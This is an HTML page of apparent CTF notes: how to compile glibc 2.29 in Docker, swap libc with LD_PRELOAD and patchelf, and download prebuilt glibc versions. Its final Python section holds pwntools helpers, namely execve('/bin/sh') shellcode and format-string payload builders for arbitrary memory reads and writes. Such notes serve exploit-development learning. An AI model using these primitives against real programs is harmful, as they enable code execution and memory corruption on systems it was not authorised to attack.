<!DOCTYPE html>
<html>
    <head>
    <meta charset="UTF-8">
    <title>~/</title>
    <link rel="stylesheet" href="style.css">

    </head>

    <body><main>
    <h1><span class="GruvboxAqua">Compiling glibc for Dummies</span></h1>

	<h2>Step 1: Setting the Environment</h2>

	<p>I like to use a Docker container for compiling since it makes installing
	tools a whole lot easier, especially if you are on a meme distribution
	(e.g. Arch). To set up all the tools and activate the container use the
	code below.</p>

	<div class="code">
<span class="Comment">#!/bin/sh</span><br>
<br>
<span class="GruvboxRed">set</span><span class="GruvboxBlue"> </span><span class="GruvboxOrange">-e</span><br>
<br>
<span class="GruvboxRed">cat</span> <span class="Normal">&gt;</span> Dockerfile <span class="Normal">&lt;&lt; EOF</span><br>
<span class="String">FROM debian:stretch</span><br>
<span class="String">ENV LC_CTYPE C.UTF-8</span><br>
<span class="String">RUN dpkg --add-architecture i386</span><br>
<span class="String">RUN apt-get update</span><br>
<span class="String">RUN apt-get install -y gawk bison build-essential curl gcc gcc-multilib git libc6:i386 make python python3</span><br>
EOF<br><br>
docker build <span class="GruvboxOrange">-t</span> debian:stretch .<br>
docker run <span class="GruvboxOrange">-ti</span> <span class="GruvboxOrange">--rm</span> debian:stretch /bin/bash<br>
	</div>

	<h2>Step 2: Preparing the Repository</h2>

	<p>In this demonstration we will be compiling glibc version 2.29. For a
	different version of glibc change the "VER" variable below. First
	things first, clone the repo and "checkout" the release version.
	Finally, create and move into a separate directory, here we use the
	"build" directory.</p>

	<div class="code">
<span class="Comment"># Desired version number</span><br>
<span class="GruvboxBlue">VER</span>=<span class="Normal">'</span><span class="String">2.29</span><span class="Normal">'</span><br>
git clone git://sourceware.org/git/glibc.git<br>
<span class="GruvboxRed">cd</span> glibc<br>
git checkout <span class="Normal">&quot;</span><span class="String">release/</span><span class="GruvboxAqua">$VER</span><span class="String">/master</span><span class="Normal">&quot;</span> <span class="GruvboxOrange">-f</span><br>
<br>
<span class="GruvboxRed">mkdir</span> build<br>
<span class="GruvboxRed">cd</span> build<br>
	</div>

	<h2>Step 3: Configure and Compile</h2>

	<p>First run the configure script to setup any options for compiling.
	The "--prefix" option is the only mandatory option which specifies
	where glibc will be installed, even though we will not be installing
	anything. For 64-bit glibc run the following code in your shell of
	choice.</p>

	<div class="code">
../configure <span class="GruvboxOrange">--prefix</span><span class="Normal">=</span><span class="Normal">'</span><span class="String">/usr</span><span class="Normal">'</span><br>
make <span class="GruvboxOrange">-j</span> <span class="GruvboxOrange">`nproc`</span><br>
	</div>

	<p>For compiling 32-bit glibc:</p>

	<div class="code">
../configure <span class="GruvboxOrange">--prefix</span><span class="Normal">=</span><span class="Normal">'</span><span class="String">/usr</span><span class="Normal">'</span> <span class="GruvboxBlue">CC</span>=<span class="Normal">'</span><span class="String">gcc -m32</span><span class="Normal">'</span> <span class="GruvboxBlue">CXX</span>=<span class="Normal">'</span><span class="String">g++ -m32</span><span class="Normal">'</span> <span class="GruvboxOrange">--build</span><span class="Normal">=</span><span class="Normal">'</span><span class="String">i486-linux</span><span class="Normal">'</span> <span class="GruvboxOrange">--host</span><span class="Normal">=</span><span class="Normal">'</span><span class="String">i486-linux</span><span class="Normal">'</span><br>
make <span class="GruvboxOrange">-j</span> <span class="GruvboxOrange">`nproc`</span><br>
	</div>

	<h2>Extra: Override Default libc</h2>

	<p>Sometimes for a CTF it is necessary to override the default libc
	in an executable. The "LD_PRELOAD" environment variable can be
	set to tell dynamic linker which library to load. For testing purposes we
	will use the following C program:</p>

	<pre><div class="code"><span class="Comment">/*</span><span class="Comment"> Compile: gcc prog.c </span><span class="Comment">*/</span>

<span class="GruvboxAqua">#include </span><span class="String">&lt;stdio.h&gt;</span>
<span class="GruvboxAqua">#include </span><span class="String">&lt;unistd.h&gt;</span>

<span class="GruvboxYellow">int</span> main (<span class="GruvboxYellow">void</span>)
{
    printf(<span class="String">&quot;pid: </span><span class="GruvboxOrange">%d</span><span class="GruvboxOrange">\n</span><span class="String">&quot;</span>, getpid());
    sleep(<span class="GruvboxPurple">999</span>);
    <span class="GruvboxRed">return</span> <span class="GruvboxPurple">0</span>;
}</div></pre>

	<p>Compile and use the LD_PRELOAD trick...</p>

	<div class="code">
$ gcc prog.c<br>
$ <span class="GruvboxBlue">LD_PRELOAD</span>=<span class="Normal">'</span><span class="String">./libc.so</span><span class="Normal">'</span> ./a.out<br>
Segmentation fault <span class="GruvboxAqua">(</span><span class="GruvboxOrange">core dumped</span><span class="GruvboxAqua">)</span><br>
	</div>

	<p>To prevent the program from crashing we need to update the dynamic
	linker in our executable. Using the "patchelf" program:</p>

	<div class="code">
$ patchelf <span class="GruvboxOrange">--set-interpreter</span> elf/ld.so ./a.out<br>
	</div>

	<p>Now run the program again using the same LD_PRELOAD trick. Use ^Z
	(control-z) to suspend the process and checkout the memory map:</p>

	<pre><div class="code">$ <span class="GruvboxBlue">LD_PRELOAD</span>=<span class="Normal">'</span><span class="String">./libc.so</span><span class="Normal">'</span> ./a.out
pid: <span class="GruvboxPurple">94392</span>
^Z
<span class="Normal">[</span><span class="GruvboxPurple">1</span><span class="Normal">]</span>+  Stopped                 <span class="GruvboxBlue">LD_PRELOAD</span>=<span class="Normal">'</span><span class="String">./libc.so</span><span class="Normal">'</span> ./a.out
$ <span class="GruvboxRed">cat</span> /proc/<span class="GruvboxPurple">94392</span>/maps
5659a000-5659b000 r-xp 00000000            /root/glibc/build/a.out
5659b000-5659c000 r--p 00000000            /root/glibc/build/a.out
5659c000-5659d000 rw-p 00001000            /root/glibc/build/a.out
565fc000-565fd000 rw-p 00001000            [heap]
f7dec000-f7f9d000 r-xp 00000000            /root/glibc/build/libc.so
f7f9d000-f7f9e000 ---p 001b1000            /root/glibc/build/libc.so
f7f9e000-f7fa0000 r--p 001b1000            /root/glibc/build/libc.so
f7fa0000-f7fa1000 rw-p 001b3000            /root/glibc/build/libc.so
f7fa1000-f7fa4000 rw-p 00000000
f7faa000-f7fac000 rw-p 00000000
f7fac000-f7fb0000 r--p 00000000            [vvar]
f7fb0000-f7fb2000 r-xp 00000000            [vdso]
f7fb2000-f7fd5000 r-xp 00000000            /root/glibc/build/elf/ld.so
f7fd5000-f7fd6000 r--p 00022000            /root/glibc/build/elf/ld.so
f7fd6000-f7fd7000 rw-p 00023000            /root/glibc/build/elf/ld.so
ffb29000-ffb4a000 rw-p 00000000            [stack]</div></pre>

	<h2>Precompiled glibc</h2>

	<p>For those of us who are too lazy to compile glibc...</h2>

	<table>
		<tr>
			<th>Version 2.24</th>
			<th>SHA256</th>
		</tr>
		<tr>
			<td><a href="/glibc/2.24_glibc_source.tar.gz">Source</a></td>
			<td>1f36dca447b2c982d117d9217ec0a83021967bf0915e3b8ea5007e5dd81b9f06</td>
		</tr>
		<tr>
			<td><a href="/glibc/2.24_glibc_build_32bit.tar.gz">32-bit build</a></td>
			<td>bd1ce2c4eaeb0cf0c5b91800cfa7be0425c438d6782976c01091a583521fa8c6</td>
		</tr>
		<tr>
			<td><a href="/glibc/2.24_glibc_build_64bit.tar.gz">64-bit build</a></td>
			<td>43985eb9572b46888dc5162e001837dd1b3980591e226c61a65dfd88ceeb6222</td>
		</tr>
	</table>

	<table>
		<tr>
			<th>Version 2.25</th>
			<th>SHA256</th>
		</tr>
		<tr>
			<td><a href="/glibc/2.25_glibc_source.tar.gz">Source</a></td>
			<td>244c03f3adf7186310dd39bb09477c2955ba0e46547bb55085516e1f873f118c</td>
		</tr>
		<tr>
			<td><a href="/glibc/2.25_glibc_build_32bit.tar.gz">32-bit build</a></td>
			<td>512bd998fdb356338882d97d92e2fe515e06d8344d90a4d8798f7e05e1256965</td>
		</tr>
		<tr>
			<td><a href="/glibc/2.25_glibc_build_64bit.tar.gz">64-bit build</a></td>
			<td>83d72f5139d9f8b14cbd21115e6edfefa94736dd88ff0853fc105c352678e674</td>
		</tr>
	</table>

	<table>
		<tr>
			<th>Version 2.26</th>
			<th>SHA256</th>
		</tr>
		<tr>
			<td><a href="/glibc/2.26_glibc_source.tar.gz">Source</a></td>
			<td>7a735b2558ad07a9f772ac6fae1d1a4748e7b7b3df6c9ec8dc69707d7ebda849</td>
		</tr>
		<tr>
			<td><a href="/glibc/2.26_glibc_build_32bit.tar.gz">32-bit build</a></td>
			<td>7f1b72c8550e8a6fbc06e7e77059a1175ea14879c837add0361544b928c2ee4d</td>
		</tr>
		<tr>
			<td><a href="/glibc/2.26_glibc_build_64bit.tar.gz">64-bit build</a></td>
			<td>99a5be3683ad83aad53a62a58cdbf8ddd1707d5ccdb64952a39737d7bd8adc4f</td>
		</tr>
	</table>

	<table>
		<tr>
			<th>Version 2.27</th>
			<th>SHA256</th>
		</tr>
		<tr>
			<td><a href="/glibc/2.27_glibc_source.tar.gz">Source</a></td>
			<td>c12ef19ead2e05f163f25225a61ed90266f485375e7a8a6d2f267fca5078fb00</td>
		</tr>
		<tr>
			<td><a href="/glibc/2.27_glibc_build_32bit.tar.gz">32-bit build</a></td>
			<td>7716cd7f62bedca25f047bb7b2c9beb74654af62e3a487c04fcae3a433a20491</td>
		</tr>
		<tr>
			<td><a href="/glibc/2.27_glibc_build_64bit.tar.gz">64-bit build</a></td>
			<td>c72f0a83b8a940f6d8656450e28bc9f799ea03845b6131398a761fea3f9ff301</td>
		</tr>
	</table>

	<table>
		<tr>
			<th>Version 2.28</th>
			<th>SHA256</th>
		</tr>
		<tr>
			<td><a href="/glibc/2.28_glibc_source.tar.gz">Source</a></td>
			<td>741cb7403885eafd6654507627d0596615a5e4c8ba645b62425f76e2bc9f9841</td>
		</tr>
		<tr>
			<td><a href="/glibc/2.28_glibc_build_32bit.tar.gz">32-bit build</a></td>
			<td>ff3c99bb61336b5a37bb523b799b6143c41689fedef8f5d659324f726230746d</td>
		</tr>
		<tr>
			<td><a href="/glibc/2.28_glibc_build_64bit.tar.gz">64-bit build</a></td>
			<td>c3361e6442cf95b9217add0c531aeae602711a1038df533513a2802ef08f8874</td>
		</tr>
	</table>

	<table>
		<tr>
			<th>Version 2.29</th>
			<th>SHA256</th>
		</tr>
		<tr>
			<td><a href="/glibc/2.29_glibc_source.tar.gz">Source</a></td>
			<td>00da4df03d6e9cd3a19d68cb6237fe9fb0710f64fd26598dcd35894c043b2a08</td>
		</tr>
		<tr>
			<td><a href="/glibc/2.29_glibc_build_32bit.tar.gz">32-bit build</a></td>
			<td>2e311fb6b93c846f5d510be262c60aa6ec97360514108214d8ce285c337b5ffc</td>
		</tr>
		<tr>
			<td><a href="/glibc/2.29_glibc_build_64bit.tar.gz">64-bit build</a></td>
			<td>a2dfdf85df90917b1dd3db303ae86c774a27cc244bf555d61184b898dde543c0</td>
		</tr>
	</table>

	<table>
		<tr>
			<th>Version 2.30</th>
			<th>SHA256</th>
		</tr>
		<tr>
			<td><a href="/glibc/2.30_glibc_source.tar.gz">Source</a></td>
			<td>1a7d57c181b9d3ef96f96645ef5f853aee234bb9a804023a32f78d80f7affe02</td>
		</tr>
		<tr>
			<td><a href="/glibc/2.30_glibc_build_32bit.tar.gz">32-bit build</a></td>
			<td>ed7d99eef39378511bbb3f41c090273dc646f0069efe202ca4d3bae321dd827b</td>
		</tr>
		<tr>
			<td><a href="/glibc/2.30_glibc_build_64bit.tar.gz">64-bit build</a></td>
			<td>e1cb5b832ce316777310565a9130c7021847e92fa0415ffef3917fe98df5da03</td>
		</tr>
	</table>

	<table>
		<tr>
			<th>Version 2.31</th>
			<th>SHA256</th>
		</tr>
		<tr>
			<td><a href="/glibc/2.31_glibc_source.tar.gz">Source</a></td>
			<td>686e857487dc012c0bb5faf1bb22057f16953570a8d1be7a254d9d7b1c46d07d</td>
		</tr>
		<tr>
			<td><a href="/glibc/2.31_glibc_build_32bit.tar.gz">32-bit build</a></td>
			<td>c4371850521a5566d8416fc755a58df494fbf059167ec03057ff8470c6f84f72</td>
		</tr>
		<tr>
			<td><a href="/glibc/2.31_glibc_build_64bit.tar.gz">64-bit build</a></td>
			<td>fa38edecbe38198cb07a73e34d383448de25211fb51789ca325023db70d18932</td>
		</tr>
	</table>

	<h1><span class="GruvboxAqua">C Chunks</span></h1>

	<h2>fgets(char *s, int size, FILE *stream);</h2>

	<p>fgets will never read "size" bytes. The most fgets will read is
	"size-1". As long as fgets is successful it will append a '\0' to the
	end of the string. A '\0' is never stored in "s[size]".</p>

	<h1><span class="GruvboxAqua">Python3 Chunks</span></h1>

	<p>Things that I always do in python3 but always forget how to do.
	Hopefully this will save me a couple of key strokes in my life time.</p>

	<pre><div class="code"><span class="Comment">#!/usr/bin/env python3</span>

<span class="GruvboxBlue">from</span> pwn <span class="GruvboxBlue">import</span> *

context.arch = <span class="String">'</span><span class="String">i386</span><span class="String">'</span>
context.bits = <span class="GruvboxPurple">32</span>

<span class="Comment"># 23 bytes</span>
<span class="GruvboxRed">def</span> <span class="GruvboxAqua">get_bin_sh</span>():
    <span class="GruvboxRed">return</span> asm(<span class="String">'''</span>
<span class="String">        /* execve(&quot;/bin/sh&quot;, NULL, NULL) */</span>

<span class="String">        /* push &quot;/bin/sh&quot; */</span>
<span class="String">        push 0x0068732f</span>
<span class="String">        push 0x6e69622f</span>
<span class="String">        mov eax, SYS_execve</span>
<span class="String">        mov ebx, esp</span>
<span class="String">        xor ecx, ecx</span>
<span class="String">        xor edx, edx</span>
<span class="String">        int 0x80</span>
<span class="String">    </span><span class="String">'''</span>)

<span class="Comment"># 24 bytes</span>
<span class="GruvboxRed">def</span> <span class="GruvboxAqua">get_bin_sh_no_nulls</span>():
    <span class="GruvboxRed">return</span> asm(<span class="String">'''</span>
<span class="String">        /* execve(&quot;/bin/sh&quot;, NULL, NULL) */</span>

<span class="String">        /* push &quot;/bin//sh&quot; */</span>
<span class="String">        xor ecx, ecx</span>
<span class="String">        push ecx</span>
<span class="String">        push 0x68732f2f</span>
<span class="String">        push 0x6e69622f</span>
<span class="String">        xor eax, eax</span>
<span class="String">        xor eax, SYS_execve</span>
<span class="String">        mov ebx, esp</span>
<span class="String">        xor edx, edx</span>
<span class="String">        int 0x80</span>
<span class="String">    </span><span class="String">'''</span>)

<span class="Comment"># Convert an integer to a byte string, useful for format string payloads</span>
<span class="GruvboxRed">def</span> <span class="GruvboxAqua">bstr</span>(n):
    <span class="GruvboxRed">return</span> <span class="GruvboxOrange">str</span>(n).encode(<span class="String">'</span><span class="String">UTF-8</span><span class="String">'</span>)

<span class="Comment"># Convert a 32bit int to array of four bytes</span>
<span class="Comment"># e.g. 0x12345678 becomes [0x12, 0x34, 0x56, 0x78]</span>
<span class="Comment"># Can take integers less than 0x10000000</span>
<span class="GruvboxRed">def</span> <span class="GruvboxAqua">int_to_arr</span>(n):
    h = <span class="GruvboxOrange">hex</span>(n)
    <span class="GruvboxRed">while</span> <span class="GruvboxOrange">len</span>(h) &lt; <span class="GruvboxOrange">len</span>(<span class="String">'</span><span class="String">0x12345678</span><span class="String">'</span>):
        h = h[:<span class="GruvboxPurple">2</span>] + <span class="String">'</span><span class="String">0</span><span class="String">'</span> + h[<span class="GruvboxPurple">2</span>:]
    <span class="GruvboxRed">return</span> [<span class="GruvboxOrange">int</span>(h[i:i+<span class="GruvboxPurple">2</span>], <span class="GruvboxPurple">16</span>) <span class="GruvboxRed">for</span> i <span class="GruvboxRed">in</span> <span class="GruvboxOrange">range</span>(<span class="GruvboxPurple">2</span>, <span class="GruvboxPurple">10</span>, <span class="GruvboxPurple">2</span>)]

<span class="Comment"># Used to check if our offset is valid</span>
<span class="Comment"># pre -&gt; byte string to be added to start of payload</span>
<span class="Comment"># offset -&gt; offset to the 0x33333333 value</span>
<span class="GruvboxRed">def</span> <span class="GruvboxAqua">fmt_check_offset</span>(pre, offset):
    ret = pre
    ret += p32(<span class="GruvboxPurple">0x33333333</span>)
    ret += b<span class="String">'</span><span class="String">%</span><span class="String">'</span> + bstr(offset) + b<span class="String">'</span><span class="String">$p</span><span class="String">'</span>
    <span class="GruvboxRed">return</span> ret

<span class="Comment"># Read a string ad a given address</span>
<span class="Comment"># pre -&gt; byte string to be added to start of payload</span>
<span class="Comment"># addr -&gt; Address to write to</span>
<span class="Comment"># offset -&gt; The format string modifier offset to reach the addr</span>
<span class="GruvboxRed">def</span> <span class="GruvboxAqua">fmt_read_string</span>(pre, addr, offset):
    ret = pre
    ret += p32(addr)
    ret += b<span class="String">'</span><span class="String">%</span><span class="String">'</span> + bstr(offset) + b<span class="String">'</span><span class="String">$s</span><span class="String">'</span>
    <span class="GruvboxRed">return</span> ret

<span class="Comment"># normal 4byte write</span>
<span class="Comment"># pre -&gt; bytes added to start of string</span>
<span class="Comment"># addr -&gt; Address to write to</span>
<span class="Comment"># val -&gt; Value to write, must be larger than len(pre + p32(addr))</span>
<span class="Comment"># offset -&gt; The format string modifier offset to reach the addr</span>
<span class="GruvboxRed">def</span> <span class="GruvboxAqua">fmt_poke_word</span>(pre, addr, value, offset):
    ret = pre
    ret += p32(addr)
    ret += b<span class="String">'</span><span class="String">%</span><span class="String">'</span> + bstr(value - <span class="GruvboxOrange">len</span>(ret)) + b<span class="String">'</span><span class="String">c</span><span class="String">'</span>
    ret += b<span class="String">'</span><span class="String">%</span><span class="String">'</span> + bstr(offset) + b<span class="String">'</span><span class="String">$n</span><span class="String">'</span>
    <span class="GruvboxRed">return</span> ret

<span class="Comment"># Do a 4 byte write with a format string but doing one byte at a time</span>
<span class="Comment"># pre -&gt; bytes added to start of string</span>
<span class="Comment"># addr -&gt; Address to write to</span>
<span class="Comment"># val -&gt; Array of four byte values to write</span>
<span class="Comment"># offset -&gt; The format string modifier offset to reach the addr</span>
<span class="GruvboxRed">def</span> <span class="GruvboxAqua">fmt_poke_bytes</span>(pre, addr, val, offset):
    ret = pre
    ret += p32(addr)
    ret += p32(addr + <span class="GruvboxPurple">1</span>)
    ret += p32(addr + <span class="GruvboxPurple">2</span>)
    ret += p32(addr + <span class="GruvboxPurple">3</span>)
    ret += b<span class="String">'</span><span class="String">%</span><span class="String">'</span> + bstr(<span class="GruvboxPurple">256</span> + val[<span class="GruvboxPurple">0</span>] - <span class="GruvboxOrange">len</span>(ret)) + b<span class="String">'</span><span class="String">c</span><span class="String">'</span>
    ret += b<span class="String">'</span><span class="String">%</span><span class="String">'</span> + bstr(offset) + b<span class="String">'</span><span class="String">$hhn</span><span class="String">'</span>
    ret += b<span class="String">'</span><span class="String">%</span><span class="String">'</span> + bstr(<span class="GruvboxPurple">256</span> + val[<span class="GruvboxPurple">1</span>] - val[<span class="GruvboxPurple">0</span>]) + b<span class="String">'</span><span class="String">c</span><span class="String">'</span>
    ret += b<span class="String">'</span><span class="String">%</span><span class="String">'</span> + bstr(offset + <span class="GruvboxPurple">1</span>) + b<span class="String">'</span><span class="String">$hhn</span><span class="String">'</span>
    ret += b<span class="String">'</span><span class="String">%</span><span class="String">'</span> + bstr(<span class="GruvboxPurple">256</span> + val[<span class="GruvboxPurple">2</span>] - val[<span class="GruvboxPurple">1</span>]) + b<span class="String">'</span><span class="String">c</span><span class="String">'</span>
    ret += b<span class="String">'</span><span class="String">%</span><span class="String">'</span> + bstr(offset + <span class="GruvboxPurple">2</span>) + b<span class="String">'</span><span class="String">$hhn</span><span class="String">'</span>
    ret += b<span class="String">'</span><span class="String">%</span><span class="String">'</span> + bstr(<span class="GruvboxPurple">256</span> + val[<span class="GruvboxPurple">3</span>] - val[<span class="GruvboxPurple">2</span>]) + b<span class="String">'</span><span class="String">c</span><span class="String">'</span>
    ret += b<span class="String">'</span><span class="String">%</span><span class="String">'</span> + bstr(offset + <span class="GruvboxPurple">3</span>) + b<span class="String">'</span><span class="String">$hhn</span><span class="String">'</span>
    <span class="GruvboxRed">return</span> ret</div></pre>

	</main></body>
</html>
